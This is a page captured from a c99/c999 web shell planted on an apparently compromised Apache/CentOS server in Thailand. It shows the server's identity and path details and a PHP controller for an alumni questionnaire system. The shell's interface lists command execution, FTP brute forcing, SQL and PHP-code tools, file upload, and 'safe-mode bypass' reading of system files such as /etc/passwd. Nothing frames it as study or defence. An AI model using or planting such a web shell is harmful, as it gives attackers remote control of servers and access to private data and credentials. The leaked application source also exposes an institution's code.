!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/ealumni/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.89%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     add_ansqn.php (12.37 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include('ea_controller.php');
class 
Add_ansqn extends Ea_controller {

//    function __construct() {
//        parent::Controller();
//    }

    
function ans_Qn($id=0) {
        
$this->load->model($this->config->item("ea_folder").'m_alumnimain','am');
        
$this->load->model($this->config->item("ea_folder").'m_ea_alumniqn','aq');
        
$this->load->model($this->config->item("ea_folder").'m_majoredu','maj');
        
$this->load->model($this->config->item("ea_folder").'m_leveledu','lev');

        
/*    1     บุคคลทั่วไป
            2     ข้าราชการ
            3     ลูกจ้างประจำ
            4     ลูกจ้างชั่วคราว
            5     อสม.
            6     บุตร อสม. */

        
$alumniId $this->input->post('alumniId') ? $this->input->post('alumniId') : $id;

        
$ord_rs_maj = array('majoreduName'    => '');
        
$this->contents['rs_maj'] = $this->maj->get_options('',$ord_rs_maj);
        
$ord_rs_lev = array('leveleduName'    => '');
        
$this->contents['rs_lev'] = $this->lev->get_options('',$ord_rs_lev);

        
// ###### ข้อมูลส่วนตัว #########
        
$con_qu_am = array('am.alumniId'    => $alumniId);
        
$this->contents['qu_am'] = $this->am->qryAmJoinAbPf($con_qu_am);

        
$con_qu_curd = array('alumniId'    => $alumniId);
        
$this->contents['qu_curd'] = $this->am->qryAmJoinCurd($con_qu_curd);
        
$this->contents['alumniId'] = $alumniId;
        
// ###### จบข้อมูลส่วนตัว #########


        /* ###### สำหรับศิษย์เก่าที่ตอบแบบสอบถามแล้ว
        หรือ มีสถานะก่อนเข้าเรียนเป็น ข้าราชการ และ ลูกจ้างประจำ*/
        
if((isset($this->contents['qu_am']->row()->amAnsQn) && $this->contents['qu_am']->row()->amAnsQn=="Y") || (isset($this->contents['qu_am']->row()->preAdmitPositionId) && $this->contents['qu_am']->row()->preAdmitPositionId==|| $this->contents['qu_am']->row()->preAdmitPositionId==3)) {
            
$con_ansQn = array('aqAlumniId'    => $alumniId);
            
$this->contents['ansQn'] = $this->aq->qryAqJoinAm($con_ansQn);

            
$con_ansQn_work = array('aqAlumniId'    => $alumniId);
            
$this->contents['ansQn_work'] = $this->aq->qryQnWorkAddr($con_ansQn_work);

            
$this->output($this->config->item("ea_folder")."v_showAnsQn");
        } else {
            
$this->output($this->config->item("ea_folder")."v_addAnsQn");
        }
    }

    function 
process_ansQn() {
        
/*
            1: ทำงานก่อนมาเรียน
            2: มีงานทำ
            3: ศึกษาต่อ
        */
        
$state $this->input->post('state');
        
$preAdmit $this->input->post('preAdmit');

        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<div class="error">','</div>');
        
$this->form_validation->set_rules('preAdmit',' ','trim|xss_clean');

        if(
$preAdmit!="2" && $preAdmit!="3") {
            
$this->form_validation->set_rules('state',' ','trim|required|xss_clean');
            if(
$state==|| ($state=="")) {
                
$this->form_validation->set_rules('aqWorkStatus',' ','trim|required|xss_clean');
                
$this->form_validation->set_rules('aqWorkStartDate',' ','trim|xss_clean');
                
$this->form_validation->set_rules('aqWorkPosition',' ','trim|required|xss_clean');
                
$this->form_validation->set_rules('aqWorkSalary',' ','trim|required|is_natural_no_zero|xss_clean');
                
$this->form_validation->set_rules('aqWorkSalarySpe',' ','trim|is_natural_no_zero|xss_clean');
                
$this->form_validation->set_rules('workCompanyT',' ','trim|required|xss_clean');
                
$this->form_validation->set_rules('workCompanyE',' ','trim|xss_clean');
                
$this->form_validation->set_rules('aqWorkAddress',' ','trim|xss_clean');
                
$this->form_validation->set_rules('dtNameWork',' ','trim|xss_clean');
                
$this->form_validation->set_rules('dtIdWork',' ','trim|xss_clean');
                
$this->form_validation->set_rules('apNameWork',' ','trim|xss_clean');
                
$this->form_validation->set_rules('apIdWork',' ','trim|xss_clean');
                
$this->form_validation->set_rules('prvNameWork',' ','trim|xss_clean');
                
$this->form_validation->set_rules('prvIdWork',' ','trim|xss_clean');
                
$this->form_validation->set_rules('aqWorkZipcode',' ','trim|is_natural_no_zero|exact_length[5]|xss_clean');
                
$this->form_validation->set_rules('aqWorkTelephone',' ','trim|is_natural_no_zero|min_length[9]|xss_clean');

                
$this->form_validation->set_rules('aqDegree',' ','trim|xss_clean');
                
$this->form_validation->set_rules('aqEduStartDate',' ','trim|xss_clean');
                
$this->form_validation->set_rules('aqMajId',' ','trim|xss_clean');
                
$this->form_validation->set_rules('aqLevelId',' ','trim|xss_clean');
                
$this->form_validation->set_rules('educationName',' ','trim|xss_clean');
                
$this->form_validation->set_rules('hedEduId',' ','trim|xss_clean');
            } else if(
$state==|| $state=="") {
                
$this->form_validation->set_rules('aqWorkStatus',' ','trim|xss_clean');
                
$this->form_validation->set_rules('aqWorkStartDate',' ','trim|xss_clean');
                
$this->form_validation->set_rules('aqWorkPosition',' ','trim|xss_clean');
                
$this->form_validation->set_rules('aqWorkSalary',' ','trim|xss_clean');
                
$this->form_validation->set_rules('aqWorkSalarySpe',' ','trim|xss_clean');
                
$this->form_validation->set_rules('workCompanyT',' ','trim|xss_clean');
                
$this->form_validation->set_rules('workCompanyE',' ','trim|xss_clean');
                
$this->form_validation->set_rules('aqWorkAddress',' ','trim|xss_clean');
                
$this->form_validation->set_rules('dtNameWork',' ','trim|xss_clean');
                
$this->form_validation->set_rules('dtIdWork',' ','trim|xss_clean');
                
$this->form_validation->set_rules('apNameWork',' ','trim|xss_clean');
                
$this->form_validation->set_rules('apIdWork',' ','trim|xss_clean');
                
$this->form_validation->set_rules('prvNameWork',' ','trim|xss_clean');
                
$this->form_validation->set_rules('prvIdWork',' ','trim|xss_clean');
                
$this->form_validation->set_rules('aqWorkZipcode',' ','trim|xss_clean');
                
$this->form_validation->set_rules('aqWorkTelephone',' ','trim|xss_clean');

                
$this->form_validation->set_rules('aqDegree',' ','trim|required|xss_clean');
                
$this->form_validation->set_rules('aqEduStartDate',' ','trim|xss_clean');
                
$this->form_validation->set_rules('aqMajId',' ','trim|required|xss_clean');
                
$this->form_validation->set_rules('aqLevelId',' ','trim|required|xss_clean');
                
$this->form_validation->set_rules('educationName',' ','trim|xss_clean');
                
$this->form_validation->set_rules('hedEduId',' ','trim|required|xss_clean');
            }
        }

        
$this->form_validation->set_rules('investiture',' ','trim|required|xss_clean');
        
$this->form_validation->set_rules('alumniId',' ','trim|xss_clean');

        if(
$this->form_validation->run() == true) {
            
$this->load->model($this->config->item("ea_folder").'m_ea_alumniqn','aq');
            
$this->load->model($this->config->item("ea_folder").'m_alumnimain','am');
            
$this->load->model($this->config->item("ea_folder").'m_ea_hiseducation','hed');
            
$this->load->model($this->config->item("ea_folder").'m_hiswork','hw');

            
// เก็บประวัติศึกษาต่อ และ การทำงาน และ update amAnsQn

            
$aqWorkStatus = ($state==2) ? $this->input->post('aqWorkStatus') : "";
            
$aqWorkStartDate = ($state==2) ? splitDateForm2($this->input->post('aqWorkStartDate'),'-') : "0000-00-00";
            
$aqWorkPosition = ($state==2) ? $this->input->post('aqWorkPosition') : "";
            
$aqWorkSalary = ($state==2) ? $this->input->post('aqWorkSalary') : "0";
            
$aqWorkSalarySpe = ($state==2) ? $this->input->post('aqWorkSalarySpe') : "0";
            
$workCompanyT = ($state==2) ? $this->input->post('workCompanyT') : "";
            
$workCompanyE = ($state==2) ? $this->input->post('workCompanyE') : "";
            
$aqWorkAddress = ($state==2) ? $this->input->post('aqWorkAddress') : "";
            
$dtIdWork = ($state==2) ? $this->input->post('dtIdWork') : "0";
            
$apIdWork = ($state==2) ? $this->input->post('apIdWork') : "0";
            
$prvIdWork = ($state==2) ? $this->input->post('prvIdWork') : "0";
            
$aqWorkZipcode = ($state==2) ? $this->input->post('aqWorkZipcode') : "0";
            
$aqWorkTelephone = ($state==2) ? $this->input->post('aqWorkTelephone') : "";
            
$aqDegree = ($state==3) ? $this->input->post('aqDegree') : "";
            
$aqEduStartDate = ($state==3) ? splitDateForm2($this->input->post('aqEduStartDate'),'-') : "0000-00-00";
            
$aqMajId = ($state==3) ? $this->input->post('aqMajId') : "0";
            
$aqLevelId = ($state==3) ? $this->input->post('aqLevelId') : "0";
            
$hedEduId = ($state==3) ? $this->input->post('hedEduId') : "0";
            
$alumniId $this->input->post('alumniId');
            
$investiture $this->input->post('investiture');

            
$this->am->alumniId $alumniId;
            
$this->am->get_by_key(TRUE);

            
$this->db->trans_begin();

            
// เฉพาะคนที่ยังไม่ตอบแบบสอบถาม
            
if($this->am->amAnsQn=="N") {
                
$this->aq->aqQnId "";
                
$this->aq->aqAlumniId $alumniId;
                
$this->aq->aqStateQn = ($state=="") ? $state;
                
$this->aq->aqWorkStatus = ($aqWorkStatus=="") ? "" $aqWorkStatus;
                
$this->aq->aqWorkCompanyT = ($workCompanyT=="") ? "" $workCompanyT;
                
$this->aq->aqWorkCompanyE = ($workCompanyE=="") ? "" $workCompanyE;
                
$this->aq->aqWorkPosition = ($aqWorkPosition=="") ? "" $aqWorkPosition;
                
$this->aq->aqWorkAddress = ($aqWorkAddress=="") ? "" $aqWorkAddress;
                
$this->aq->aqWorkDtId $dtIdWork;
                
$this->aq->aqWorkApId $apIdWork;
                
$this->aq->aqWorkPrvId $prvIdWork;
                
$this->aq->aqWorkZipcode = ($aqWorkZipcode=="") ? "" $aqWorkZipcode;
                
$this->aq->aqWorkTelephone = ($aqWorkTelephone=="") ? "" $aqWorkTelephone;
                
$this->aq->aqWorkSalary $aqWorkSalary;
                
$this->aq->aqWorkSalarySpe $aqWorkSalarySpe;
                
$this->aq->aqWorkStartDate $aqWorkStartDate;
                
$this->aq->aqDegree = ($aqDegree=="") ? "" $aqDegree;
                
$this->aq->aqLevelId $aqLevelId;
                
$this->aq->aqMajId $aqMajId;
                
$this->aq->aqEduId $hedEduId;
                
$this->aq->aqEduStartDate $aqEduStartDate;
                
$this->aq->aqInvestiture $investiture;
                
$this->aq->aqUserId $this->session->userdata('UsLogin');
                
$this->aq->aqUserUpdate date('Y-m-d H:i:s');
                
$this->aq->insert();

                
$this->am->updateUserId $this->session->userdata('UsLogin');
                
$this->am->updateDateTime date('Y-m-d H:i:s');
                
$this->am->amAnsQn "Y";
                
$this->am->update();

                if(
$state==2) {            // มีงานทำ
                    
$con_hw_seqId = array('alumniId'    => $alumniId);
                    
$this->hw->seqId $this->hw->getNextSeq($con_hw_seqId);
                    
$this->hw->alumniId $alumniId;
                    
$this->hw->companyNameT = ($workCompanyT=="") ? "" $workCompanyT;
                    
$this->hw->companyNameE = ($workCompanyE=="") ? "" $workCompanyE;
                    
$this->hw->companyAddr = ($aqWorkAddress=="") ? "" $aqWorkAddress;
                    
$this->hw->companyPosition = ($aqWorkPosition=="") ? "" $aqWorkPosition;
                    
$this->hw->companyAdmidPosYear NULL;
                    
$this->hw->companyStartDate $aqWorkStartDate;
                    
$this->hw->companyEndDate "0000-00-00";
                    
$this->hw->hwUserId $this->session->userdata('UsLogin');
                    
$this->hw->hwUserUpdate date('Y-m-d H:i:s');
                    
$this->hw->insert();
                } else if(
$state==3) {    // ศึกษาต่อ
                    
$con_hed_seqId = array('hedSeqId'    => $alumniId);
                    
$this->hed->hedSeqId $this->hed->getNextSeq($con_hed_seqId);
                    
$this->hed->hedAlumniId $alumniId;
                    
$this->hed->hedDegree = ($aqDegree=="") ? "" $aqDegree;
                    
$this->hed->hedLevelId $aqLevelId;
                    
$this->hed->hedEduId $hedEduId;
                    
$this->hed->hedMajId $aqMajId;
                    
$this->hed->hedStartDate $aqEduStartDate;
                    
$this->hed->hedFinishDate "0000-00-00";
                    
$this->hed->hedUserId $this->session->userdata('UsLogin');
                    
$this->hed->hedUserUpdate date('Y-m-d H:i:s');
                    
$this->hed->insert();
                }
            }

            if(
$this->db->trans_status() === false) {
                
$this->db->trans_rollback();
                
$stateFlg "เกิดความผิดพลาดในการตอบแบบสอบถาม ลองใหม่อีกครั้ง";
            } else {
                
$this->db->trans_commit();
                
$stateFlg "ตอบแบบสอบถามเรียบร้อย";
            }

            
$this->session->set_flashdata('stateFlg'$stateFlg);
            
redirect($this->config->item("ea_folder")."add_ansqn/ans_Qn/$alumniId");
        
            
//$this->load->vars(array('stateFlg' => $stateFlg));
            //$this->ans_qn($alumniId);

        
} else {
            
$this->ans_Qn();
        }
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0335 ]--